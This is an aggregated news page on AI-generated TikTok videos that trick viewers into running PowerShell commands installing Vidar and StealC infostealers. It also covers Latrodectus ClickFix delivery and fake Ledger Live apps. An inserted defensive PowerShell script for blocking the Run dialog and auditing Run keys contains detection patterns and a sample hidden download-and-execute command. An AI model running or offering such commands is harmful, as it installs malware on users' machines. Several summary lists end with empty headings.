3 Sources
[1]
TikTok videos now push infostealer malware in ClickFix attacks
Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks. As Trend Micro recently discovered, the threat actors behind this TikTok social engineering campaign are using videos likely generated using AI that ask viewers to run commands claiming to activate Windows and Microsoft Office, as well as premium features in various legitimate software like CapCut and Spotify. "This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said. "The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," it added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos." One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views, with over 20,000 likes and more than 100 comments. In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions. After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases. StealC can also harvest a wide range of sensitive information from infected computers as it targets dozens of web browsers and cryptocurrency wallets.
After the device is compromised, the script will download a second PowerShell script payload from hxxps://amssh[.]co/script[.]ps1 that will add a registry key to launch at startup automatically. ClickFix is a tactic where attackers employ fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running malicious scripts to download and install malware on their devices. While generally targeting Windows users through PowerShell commands, ClickFix has also been adopted in attacks against macOS and Linux users. State-sponsored threat groups have also hacked their targets in similar attacks, with APT28 and ColdRiver (Russia), Kimsuky (North Korea), and MuddyWater (Iran) having all used these tactics in espionage campaigns in recent months. This is not the first time TikTok videos were used to push malware, with cybercriminals capitalizing on a trending TikTok challenge named 'Invisible Challenge' to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. The malware was pushed through videos that received over a million views shortly after being posted and can steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also been flooding TikTok with fake cryptocurrency giveaways, almost all using Elon Musk, Tesla, or SpaceX themes.
[2]
Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique
The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security tools to detect or block the malware." Latrodectus, believed to be a successor to IcedID, is the name given to a malware that acts as a downloader for other payloads, such as ransomware. It was first documented by Proofpoint and Team Cymru in April 2024. Incidentally, the malware is one among the many malicious software to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Latrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025. In the latest set of Latrodectus attacks observed by Expel in May 2025, unsuspecting users are tricked into copying and executing a PowerShell command from an infected website, a tactic that has become a prevalent method to distribute a wide range of malware. "When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said. "This keeps the attacker from having to write the file to the computer and risk being detected by the browser or an antivirus that might detect it on disk." The MSI installer contains a legitimate application from NVIDIA, which is used to sideload a malicious DLL, which then uses curl to download the main payload. To mitigate attacks of this type, it's advised to disable the Windows Run program using Group Policy Objects (GPOs) or turn off the "Windows + R" hot key via a Windows Registry change.
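The two defensive actions this reporting points at, blocking the Run dialog that ClickFix instructions rely on and auditing the Run keys the dropped scripts use for startup persistence, as an added PowerShell example. This is not code from the page, Expel or Trend Micro. The Explorer NoRun policy value is a documented Windows policy; the function names, parameters, detection regexes and the sample commands are this example's own constructs, and the sample commands are constructed strings rather than observed indicators.

```powershell
# Added example (not from the articles above). Run in Windows PowerShell 5.1 or
# PowerShell 7 on Windows; HKCU changes need only the user's own session,
# the HKLM audit needs an elevated prompt.

# --- Mitigation: Explorer policy NoRun=1 removes "Run..." and blocks Win+R ---
# This is the registry value behind the GPO setting that disables the Run dialog.
# The function name and its -Scope/-Restore parameters are assumptions of this example.
function Set-RunDialogPolicy {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [ValidateSet('User', 'Machine')][string]$Scope = 'User',
        [switch]$Restore   # set NoRun=0 to re-enable the Run dialog
    )
    $hive  = if ($Scope -eq 'Machine') { 'HKLM:' } else { 'HKCU:' }
    $key   = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    $value = if ($Restore) { 0 } else { 1 }
    if ($PSCmdlet.ShouldProcess($key, "Set NoRun=$value")) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name NoRun -Value $value -Type DWord
    }
    # Explorer reads the policy at logon; sign out and in (or restart explorer.exe) to apply.
}

# --- Detection: flag Run-key commands that look like a hidden PowerShell download cradle ---
# Heuristic only: indicators are taken from the behaviour described in the reporting
# (PowerShell started hidden, fetching a script from a remote URL, policy bypass).
function Test-SuspiciousRunCommand {
    param([Parameter(Mandatory)][string]$Command)
    $isPowerShell = $Command -match '\b(powershell|pwsh)(\.exe)?\b'
    $hasRemote    = $Command -match 'https?://|\biwr\b|invoke-webrequest|downloadstring|\birm\b|invoke-restmethod'
    $isEvasive    = $Command -match '-w\w*\s+hidden|-e(c|nc\w*)?\s|-nop\b|-ep\s+bypass|executionpolicy\s+bypass'
    return ($isPowerShell -and ($hasRemote -or $isEvasive))
}

function Get-SuspiciousRunEntries {
    $paths = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($p in $paths) {
        if (-not (Test-Path $p)) { continue }
        $item = Get-ItemProperty -Path $p
        foreach ($prop in $item.PSObject.Properties) {
            # Skip the provider metadata properties Get-ItemProperty adds.
            if ($prop.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
            $cmd = [string]$prop.Value
            if (Test-SuspiciousRunCommand -Command $cmd) {
                [pscustomobject]@{ Key = $p; Name = $prop.Name; Command = $cmd }
            }
        }
    }
}

# Constructed samples (not real indicators) showing what the heuristic flags and ignores.
$samples = @(
    'powershell -w hidden -ep bypass -c "irm https://example.invalid/update.ps1 | iex"',
    '"C:\Program Files\Vendor\Updater.exe" /background'
)
$samples | ForEach-Object { '{0}  <=  {1}' -f (Test-SuspiciousRunCommand $_), $_ }

# Usage:
#   Get-SuspiciousRunEntries | Format-Table -AutoSize
#   Set-RunDialogPolicy -Scope User -WhatIf     # preview, then drop -WhatIf to apply
```

The NoRun policy stops the Win+R workflow the videos walk viewers through, but it does not stop a user from pasting the same command into a terminal they open another way, so treat it as one control alongside script block logging and the Run-key audit above; a flagged entry pointing at a URL or a script in a user-writable directory is worth pulling for triage rather than deleting blind.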
From ClickFix to TikTok
The disclosure comes as Trend Micro revealed details of a new engineering campaign that instead of relying on fake CAPTCHA pages employs TikTok videos likely generated using artificial intelligence (AI) tools to deliver the Vidar and StealC information stealers by instructing users to run malicious commands on their systems to activate Windows, Microsoft Office, CapCut, and Spotify. These videos have been posted from various TikTok accounts such as @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly" has amassed nearly 500,000 views, with over 20,000 likes and more than 100 comments. The campaign marks a new escalation of ClickFix in that users searching for ways to activate pirated apps are verbally and visually guided to open the Windows Run dialog by pressing the "Windows + R" hot key, launch PowerShell, and run the command highlighted in the video, ultimately compromising their own systems. "Threat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially engineer users into executing PowerShell commands under the guise of guiding them to activate legitimate software or unlock premium features," security researcher Junestherry Dela Cruz said. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware."
Fake Ledger Apps Used to Steal Mac Users' Seed Phrases
The findings also follow the discovery of four different malware campaigns that leverage a cloned version of the Ledger Live app to steal sensitive data, including seed phrases, with the goal of draining victims' cryptocurrency wallets. The activity has been ongoing since August 2024.
The attacks make use of malicious DMG files that, when launched, launch AppleScript to exfiltrate passwords and Apple Notes data, and then download a trojanized version of Ledger Live. Once the app is opened, it warns users of a supposed account problem and that it requires their seed phrase for recovery. The entered seed phrase is sent to an attacker-controlled server. Moonlock Lab, which shed light on the campaign, said the rogue apps make use of macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey, the latter of which introduced the novel phishing scheme in March 2025. It's worth noting that the activity overlaps with a macOS infostealer campaign that targets Ledger Live users through PyInstaller-packed binaries, as revealed by Jamf this month. "On dark web forums, chatter around anti-Ledger schemes is growing. The next wave is already taking shape," MacPaw's cybersecurity division noted. "Hackers will continue to exploit the trust crypto owners place in Ledger Live."
[3]
These AI-Generated TikTok Videos Are Tricking People Into Installing Malware
In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks. The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned "Boost Your Spotify Experience Instantly -- Here's How!" and has nearly half a million views. These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware. TikTok's engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok's trending "Invisible Challenge" to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying "activation" deposits using Bitcoin. ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to "fix" the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too. In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest data ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. 
Once run, the script will download a second PowerShell script allowing it to launch automatically upon device startup. It also saves in a hidden directory and deletes temporary folders so it can evade detection. Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with those that are legitimate, like from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There's no malicious code actually embedded in or delivered by these instructional videos -- the scheme is dependent on social engineering via verbal directions -- making the threat technically harder to detect.
Cybercriminals are using AI-generated TikTok videos to trick users into installing Vidar and StealC malware through ClickFix attacks, posing as software activation guides.
Cybercriminals have launched a sophisticated campaign using AI-generated TikTok videos to distribute malware through a technique known as ClickFix. These videos, which have garnered significant viewership, purport to offer instructions for activating software or unlocking premium features in popular applications like Windows, Microsoft Office, CapCut, and Spotify [1][2].
Source: Lifehacker
ClickFix is a social engineering tactic that tricks users into executing malicious commands under the guise of fixing technical issues or verifying their identity. In this case, the attackers use TikTok's algorithmic reach to expose a wide audience to their deceptive content [1]. One video, promising to "boost your Spotify experience instantly," has amassed nearly 500,000 views, demonstrating the campaign's potential reach [1][3].
The malicious process unfolds as follows:
Both Vidar and StealC are potent information stealers with extensive capabilities:
The malware employs sophisticated methods to maintain its presence on infected systems:
Source: The Hacker News
This campaign is not an isolated incident. TikTok has been increasingly targeted by cybercriminals due to its vast user base and engagement-driven algorithm. Previous schemes have included:
The use of AI in generating these videos marks a significant evolution in cybercriminal tactics. AI-generated content allows for rapid and widespread distribution of malicious instructions, making the threat more difficult to contain [2][3].
To protect against such attacks, experts recommend:
As cybercriminals continue to exploit popular platforms and emerging technologies, users must remain vigilant and critical of the content they encounter online, even when it appears helpful or instructional.